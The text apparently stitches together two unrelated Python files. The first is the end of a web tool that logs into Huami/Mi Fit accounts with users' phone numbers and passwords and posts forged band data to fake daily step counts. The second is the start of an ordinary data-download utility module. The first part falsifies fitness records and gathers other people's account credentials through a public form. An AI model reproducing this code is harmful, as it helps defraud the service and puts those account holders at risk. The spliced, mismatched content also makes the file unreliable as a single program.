2FOv84%5C%2F0v%5C%2FO%5C%2F84%5C%2Fzf%5C%2FMP83%5C%2FzH%5C%2FNv83%5C%2Fzf%5C%2FN%5C%2F84%5C%2Fzf%5C%2FOf82%5C%2Fzf%5C%2FOP83%5C%2Fzb%5C%2FMv81%5C%2FzX%5C%2FR%5C%2F9L%5C%2F0v%5C%2FO%5C%2F9I%5C%2F0T%5C%2FS%5C%2F9A%5C%2Fzn%5C%2FPf89%5C%2Fzn%5C%2FNf9K%5C%2F07%5C%2FN%5C%2F83%5C%2Fzn%5C%2FNv83%5C%2Fzv%5C%2FO%5C%2F9A%5C%2F0H%5C%2FOf8%5C%2F%5C%2Fzj%5C%2FPP83%5C%2Fzj%5C%2FS%5C%2F87%5C%2Fzj%5C%2FNv84%5C%2Fzf%5C%2FOf83%5C%2Fzf%5C%2FOf83%5C%2Fzb%5C%2FNv9L%5C%2Fzj%5C%2FNv82%5C%2Fzb%5C%2FN%5C%2F85%5C%2Fzf%5C%2FN%5C%2F9J%5C%2Fzf%5C%2FNv83%5C%2Fzj%5C%2FNv84%5C%2F0r%5C%2FSv83%5C%2Fzf%5C%2FMP%5C%2F%5C%2F%5C%2Fzb%5C%2FMv82%5C%2Fzb%5C%2FOf85%5C%2Fz7%5C%2FNv8%5C%2F%5C%2F0r%5C%2FS%5C%2F85%5C%2F0H%5C%2FQP9B%5C%2F0D%5C%2FNf89%5C%2Fzj%5C%2FOv83%5C%2Fzv%5C%2FNv8%5C%2F%5C%2F0f%5C%2FSv9O%5C%2F0ZeXv%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F1X%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9B%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2FTP%5C%2F%5C%2F%5C%2F1b%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F0%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F9N%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2F%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%5C%2Fv7%2B%22%2C%22date%22%3A%222021-08-07%22%2C%22data%22%3A%5B%7B%22start%22%3A0%2C%22stop%22%3A1439%2C%22value%22%3A%22UA8AUBQAUAwAUBoAUAEAYCcAUBkAUB4AUBgAUCAAUAEAUBkAUAwAYAsAYB8AYB0AYBgAYCoAYBgAYB4AUCcAUBsAUB8AUBwAUBIAYBkAYB8AUBoAUBMAUCEAUCIAYBYAUBwAUCAAUBgAUCAAUBcAYBsAYCUAATIPYD0KECQAYDMAYB0AYAsAYCAAYDwAYCIAYB0AYBcAYCQAYB0AYBAAYCMAYAoAYCIAYCEAYCYAYBsAYBUAYAYAYCIAYCMAUB0AUCAAUBYAUCoAUBEAUC8AUB0AUBYAUDMAUDoAUBkAUC0AUBQAUBwAUA0AUBsAUAoAUCEAUBYAUAwAUB4AUAwAUCcAUCYAUCwKYDUAAUUlEC8IYEMAYEgAYDoAYBAAUAMAUBkAWgAAWgAAWgAAWgAAWgAAUAgAWgAAUBAAUAQAUA4AUA8AUAkAUAIAUAYAUAcAUAIAWgAAUAQAUAkAUAEAUBkAUCUAWgAAUAYAUBEAWgAAUBYAWgAAUAYAWgAAWgAAWgAAWgAAUBcAUAcAWgAAUBUAUAoAUAIAWgAAUAQAUAYAUCgAWgAAUAgAWgAAWgAAUAwAWwAAXCMAUBQAWwAAUAIAWgAAWgAAWgAAWgAAWgAAWgAAWgAAWgAAWREAWQIAUAMAWSEAUDoAUDIAUB8AUCEAUC4AXB4AUA4AWgAAUBIAUA8AUBAAUCUAUCIAUAMAUAEAUAsAUAMAUCwAUBYAWgAAWgAAWgAAWgAAWgAAWgAAUAYAWgAAWgAAWgAAUAYAWwAAWgAAUAYAXAQAUAMAUBsAUBcAUCAAWwAAWgAAWgAAWgAAWgAAUBgAUB4AWgAAUAcAUAwAWQIAWQkAUAEAUAIAWgAAUAoAWgAAUAYAUB0AWgAAWgAAUAkAWgAAWSwAUBIAWgAAUC4AWSYAWgAAUAYAUAoAUAkAUAIAUAcAWgAAUAEAUBEAUBgAUBcAWRYAUA0AWSgAUB4AUDQAUBoAXA4AUA8AUBwAUA8AUA4AUA4AWgAAUAIAUCMAWgAAUCwAUBgAUAYAUAAAUAAAUAAAUAAAUAAAUAAAUAAAUAAAUAAAWwAAUAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAeSEAeQ8AcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBcAcAAAcAAAcCYOcBUAUAAAUAAAUAAAUAAAUAUAUAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcCgAeQAAcAAAcAAAcAAAcAAAcAAAcAYAcAAAcBgAeQAAcAAAcAAAegAAegAAcAAAcAcAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcCkAeQAAcAcAcAAAcAAAcAwAcAAAcAAAcAIAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcCIAeQAAcAAAcAAAcAAAcAAAcAAAeRwAeQAAWgAAUAAAUAAAUAAAUAAAUAAAcAAAcAAAcBoAeScAeQAAegAAcBkAeQAAUAAAUAAAUAAAUAAAUAAAUAAAcAAAcAAAcAAAcAAAcAAAcAAAegAAegAAcAAAcAAAcBgAeQAAcAAAcAAAcAAAcAAAcAAAcAkAegAAegAAcAcAcAAAcAcAcAAAcAAAcAAAcAAAcA8AeQAAcAAAcAAAeRQAcAwAUAAAUAAAUAAAUAAAUAAAUAAAcAAAcBEAcA0AcAAAWQsAUAAAUAAAUAAAUAAAUAAAcAAAcAoAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAYAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBYAegAAcAAAcAAAegAAcAcAcAAAcAAAcAAAcAAAcAAAeRkAegAAegAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAEAcAAAcAAAcAAAcAUAcAQAcAAAcBIAeQAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBsAcAAAcAAAcBcAeQAAUAAAUAAAUAAAUAAAUAAAUBQAcBYAUAAAUAAAUAoAWRYAWTQAWQAAUAAAUAAAUAAAcAAAcAAAcAAAcAAAcAAAcAMAcAAAcAQAcAAAcAAAcAAAcDMAeSIAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcAAAcBQAeQwAcAAAcAAAcAAAcAMAcAAAeSoAcA8AcDMAcAYAeQoAcAwAcFQAcEMAeVIAaTYAbBcNYAsAYBIAYAIAYAIAYBUAYCwAYBMAYDYAYCkAYDcAUCoAUCcAUAUAUBAAWgAAYBoAYBcAYCgAUAMAUAYAUBYAUA4AUBgAUAgAUAgAUAsAUAsAUA4AUAMAUAYAUAQAUBIAASsSUDAAUDAAUBAAYAYAUBAAUAUAUCAAUBoAUCAAUBAAUAoAYAIAUAQAUAgAUCcAUAsAUCIAUCUAUAoAUA4AUB8AUBkAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAAfgAA%22%2C%22tz%22%3A32%2C%22did%22%3A%22DA932FFFFE8816E7%22%2C%22src%22%3A24%7D%5D%2C%22summary%22%3A%22%7B%5C%22v%5C%22%3A6%2C%5C%22slp%5C%22%3A%7B%5C%22st%5C%22%3A1628296479%2C%5C%22ed%5C%22%3A1628296479%2C%5C%22dp%5C%22%3A0%2C%5C%22lt%5C%22%3A0%2C%5C%22wk%5C%22%3A0%2C%5C%22usrSt%5C%22%3A-1440%2C%5C%22usrEd%5C%22%3A-1440%2C%5C%22wc%5C%22%3A0%2C%5C%22is%5C%22%3A0%2C%5C%22lb%5C%22%3A0%2C%5C%22to%5C%22%3A0%2C%5C%22dt%5C%22%3A0%2C%5C%22rhr%5C%22%3A0%2C%5C%22ss%5C%22%3A0%7D%2C%5C%22stp%5C%22%3A%7B%5C%22ttl%5C%22%3A18272%2C%5C%22dis%5C%22%3A10627%2C%5C%22cal%5C%22%3A510%2C%5C%22wk%5C%22%3A41%2C%5C%22rn%5C%22%3A50%2C%5C%22runDist%5C%22%3A7654%2C%5C%22runCal%5C%22%3A397%2C%5C%22stage%5C%22%3A%5B%7B%5C%22start%5C%22%3A327%2C%5C%22stop%5C%22%3A341%2C%5C%22mode%5C%22%3A1%2C%5C%22dis%5C%22%3A481%2C%5C%22cal%5C%22%3A13%2C%5C%22step%5C%22%3A680%7D%2C%7B%5C%22start%5C%22%3A342%2C%5C%22stop%5C%22%3A367%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A2295%2C%5C%22cal%5C%22%3A95%2C%5C%22step%5C%22%3A2874%7D%2C%7B%5C%22start%5C%22%3A368%2C%5C%22stop%5C%22%3A377%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1592%2C%5C%22cal%5C%22%3A88%2C%5C%22step%5C%22%3A1664%7D%2C%7B%5C%22start%5C%22%3A378%2C%5C%22stop%5C%22%3A386%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A1072%2C%5C%22cal%5C%22%3A51%2C%5C%22step%5C%22%3A1245%7D%2C%7B%5C%22start%5C%22%3A387%2C%5C%22stop%5C%22%3A393%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1036%2C%5C%22cal%5C%22%3A57%2C%5C%22step%5C%22%3A1124%7D%2C%7B%5C%22start%5C%22%3A394%2C%5C%22stop%5C%22%3A398%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A488%2C%5C%22cal%5C%22%3A19%2C%5C%22step%5C%22%3A607%7D%2C%7B%5C%22start%5C%22%3A399%2C%5C%22stop%5C%22%3A414%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A2220%2C%5C%22cal%5C%22%3A120%2C%5C%22step%5C%22%3A2371%7D%2C%7B%5C%22start%5C%22%3A415%2C%5C%22stop%5C%22%3A427%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A1268%2C%5C%22cal%5C%22%3A59%2C%5C%22step%5C%22%3A1489%7D%2C%7B%5C%22start%5C%22%3A428%2C%5C%22stop%5C%22%3A433%2C%5C%22mode%5C%22%3A1%2C%5C%22dis%5C%22%3A152%2C%5C%22cal%5C%22%3A4%2C%5C%22step%5C%22%3A238%7D%2C%7B%5C%22start%5C%22%3A434%2C%5C%22stop%5C%22%3A444%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A2295%2C%5C%22cal%5C%22%3A95%2C%5C%22step%5C%22%3A2874%7D%2C%7B%5C%22start%5C%22%3A445%2C%5C%22stop%5C%22%3A455%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1592%2C%5C%22cal%5C%22%3A88%2C%5C%22step%5C%22%3A1664%7D%2C%7B%5C%22start%5C%22%3A456%2C%5C%22stop%5C%22%3A466%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A1072%2C%5C%22cal%5C%22%3A51%2C%5C%22step%5C%22%3A1245%7D%2C%7B%5C%22start%5C%22%3A467%2C%5C%22stop%5C%22%3A477%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A1036%2C%5C%22cal%5C%22%3A57%2C%5C%22step%5C%22%3A1124%7D%2C%7B%5C%22start%5C%22%3A478%2C%5C%22stop%5C%22%3A488%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A488%2C%5C%22cal%5C%22%3A19%2C%5C%22step%5C%22%3A607%7D%2C%7B%5C%22start%5C%22%3A489%2C%5C%22stop%5C%22%3A499%2C%5C%22mode%5C%22%3A4%2C%5C%22dis%5C%22%3A2220%2C%5C%22cal%5C%22%3A120%2C%5C%22step%5C%22%3A2371%7D%2C%7B%5C%22start%5C%22%3A500%2C%5C%22stop%5C%22%3A511%2C%5C%22mode%5C%22%3A3%2C%5C%22dis%5C%22%3A1268%2C%5C%22cal%5C%22%3A59%2C%5C%22step%5C%22%3A1489%7D%2C%7B%5C%22start%5C%22%3A512%2C%5C%22stop%5C%22%3A522%2C%5C%22mode%5C%22%3A1%2C%5C%22dis%5C%22%3A152%2C%5C%22cal%5C%22%3A4%2C%5C%22step%5C%22%3A238%7D%5D%7D%2C%5C%22goal%5C%22%3A8000%2C%5C%22tz%5C%22%3A%5C%2228800%5C%22%7D%22%2C%22source%22%3A24%2C%22type%22%3A0%7D%5D'
finddate = re.compile(r'.*?date%22%3A%22(.*?)%22%2C%22data.*?')
findstep = re.compile(r'.*?ttl%5C%22%3A(.*?)%2C%5C%22dis.*?')
data_json = re.sub(finddate.findall(data_json)[0], today, str(data_json))
data_json = re.sub(findstep.findall(data_json)[0], step, str(data_json))
url = f'https://api-mifit-cn.huami.com/v1/data/band_data.json?&t={t}'
head = {
"apptoken": app_token,
"Content-Type": "application/x-www-form-urlencoded"
}
data = f'userid={userid}&last_sync_data_time=1597306380&device_type=0&last_deviceid=DA932FFFFE8816E7&data_json={data_json}'
response = requests.post(url, data=data, headers=head).json()
result = f"用户:{user[:4]}****{user[-4:]} 修改步数({step}步)" + response['message']
push_pushplus(Push_Token,
f"用户:{phones}刷了{steps}步,这是今天第{r.incr('usercounts')}个刷步数的用户!")
return result
# 获取时间戳
def get_time():
url = 'http://api.m.taobao.com/rest/api3.do?api=mtop.common.getTimestamp'
response = requests.get(url, headers=headers).json()
t = response['data']['t']
return t
# 获取app_token
def get_app_token(login_token):
url = f"https://account-cn.huami.com/v1/client/app_tokens?app_name=com.xiaomi.hm.health&dn=api-user.huami.com%2Capi-mifit.huami.com%2Capp-analytics.huami.com&login_token={login_token}"
response = requests.get(url, headers=headers).json()
app_token = response['token_info']['app_token']
print("app_token获取成功!")
# print(app_token)
return app_token
# 推送pushplus
def push_pushplus(token, content=""):
"""
推送消息到pushplus(old) 一对一推送
"""
if token == '':
print("[注意] 未提供token,不进行pushplus推送!")
else:
if "600" in requests.get(f"http://pushplus.hxtrip.com/send", params={"token": token, "content": "测试"}).text:
server_url = f"http://www.pushplus.plus/send"
else:
server_url = f"http://pushplus.hxtrip.com/send"
params = {
"token": token,
"title": '小米运动【粉丝刷步通知】',
"content": content
}
response = requests.get(server_url, params=params)
if "200" in response.text:
print(f"[{now}] 推送成功。")
else:
json_data = response.json()
if json_data['code'] == 200:
print(f"[{now}] 推送成功。")
else:
print(f"[{now}] 推送失败:{json_data['code']}({json_data['message']})")
# print(f"[{now}] 推送失败:{response.text}")
user = str(phones)
passwd = str(psws)
# 要修改的步数,直接输入想要修改的步数值,留空为随机步数
step = str(steps).replace('[', '').replace(']', '')
user_list = user.split('#')
passwd_list = passwd.split('#')
setp_array = step.split('-')
if len(user_list) == len(passwd_list):
push = ''
for line in range(0, len(user_list)):
if len(setp_array) == 2:
step = str(random.randint(int(setp_array[0]), int(setp_array[1])))
print(f"已设置为随机步数({setp_array[0]}-{setp_array[1]})")
elif str(step) == '0':
step = '6666'
push += main(user_list[line], passwd_list[line], step) + '\n'
pass
print(push)
toast(push)
else:
print('用户名和密码数量不对,请查看!!!')
def resetcounts():
def redisjob():
r.set('usercounts', 8)
scheduler = BlockingScheduler()
scheduler.add_job(redisjob, 'cron', month='*', day='*', hour=23, minute=59, second=59)
scheduler.start()
if __name__ == '__main__':
# "https://cdn.jsdelivr.net/gh/acloudtwei/CDN/js/mouse.js",
threads = threading.Thread(target=resetcounts)
threads.start()
weipyweb.config(title="运动刷步数助手(手动版)", description="acloudtwei个人开发网站",
theme="sketchy", js_code='',
js_file=[
"https://cdn.jsdelivr.net/gh/acloudtwei/CDN/js/lines.js",
"https://cdn.jsdelivr.net/gh/acloudtwei/CDN/js/china.js"]
, css_file=[""])
# start_server(mi, port=801, host="0.0.0.0")
application = tornado.web.Application([
(r"/", webio_handler(mi)),
(r"/help", webio_handler(xiaomihelp))
])
print("启动ing...")
application.listen(port=80, address='0.0.0.0')
tornado.ioloop.IOLoop.current().start()
|
data_utils.py | """Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import multiprocessing as mp
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import warnings
import zipfile
from abc import abstractmethod
from contextlib import closing
from multiprocessing.pool import ThreadPool
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
try:
import queue
except ImportError:
import Queue as queue
from ..utils.generic_utils import Progbar
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrive` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
# Arguments
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
